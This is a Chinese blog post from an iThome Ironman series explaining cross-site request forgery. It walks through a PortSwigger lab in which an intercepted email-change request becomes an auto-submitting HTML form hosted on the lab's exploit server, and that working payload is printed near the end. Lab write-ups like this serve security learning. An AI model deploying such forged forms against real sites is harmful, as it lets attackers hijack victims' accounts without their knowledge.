iT邦幫忙

2023 iThome 鐵人賽

DAY 11
0

CSRF 是什麼?

假設你登入了一個網站(例如你的銀行帳戶)並且保持登入狀態。如果你同時訪問了一個惡意網站,這個網站可以在背景中,偷偷地發送一個請求到你的銀行帳戶,比如進行轉帳操作。因為你的銀行認為這是你自己的操作,所以它會執行這個請求。

Lab time

https://ithelp.ithome.com.tw/upload/images/20230926/20162491H0lUijiChi.png
利用題目給我們的帳號密碼登入,發現有一個 Update email 。是不是就是這裡了~

https://ithelp.ithome.com.tw/upload/images/20230926/20162491OsQaDtxuBA.png
我們先送一個request然後攔截
https://ithelp.ithome.com.tw/upload/images/20230926/201624916FGcwVnbg6.png
透過 CSRF poc generator 可以生成類似的 http request。Burp Suite Pro 有內建工具可以使用,但我很窮買不起QAQ
https://ithelp.ithome.com.tw/upload/images/20230926/20162491BIW2pXksXH.png

然後我們就可以去 Exploit Server 聳東西啦
https://ithelp.ithome.com.tw/upload/images/20230926/20162491A3xyuZRvae.png

https://ithelp.ithome.com.tw/upload/images/20230926/20162491NBEHqHw7JO.png

<html>
	<body>
		<form method="POST" action="https://0a1d00aa0320e11480b22ba8009d0010.web-security-academy.net/my-account/change-email">
			<input type="hidden" name="email" value="wiener%40normal-user.net"/>
			<input type="submit" value="Submit">
<script>document.forms[0].submit()</script>
		</form>
	</body>
<html>

參考資料

https://hackmd.io/@starPt/r1ReJxVm8
https://tech-blog.cymetrics.io/posts/jo/zerobased-cross-site-request-forgery/


上一篇
[Day 10]XSS(跨站腳本攻擊)
下一篇
[Day 12]CSRF(跨站請求偽造)攻擊 - SameSite
系列文
從 Moblie Development 主題被損友洗腦鬼轉 Security 的我真的可以完賽嗎?30
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言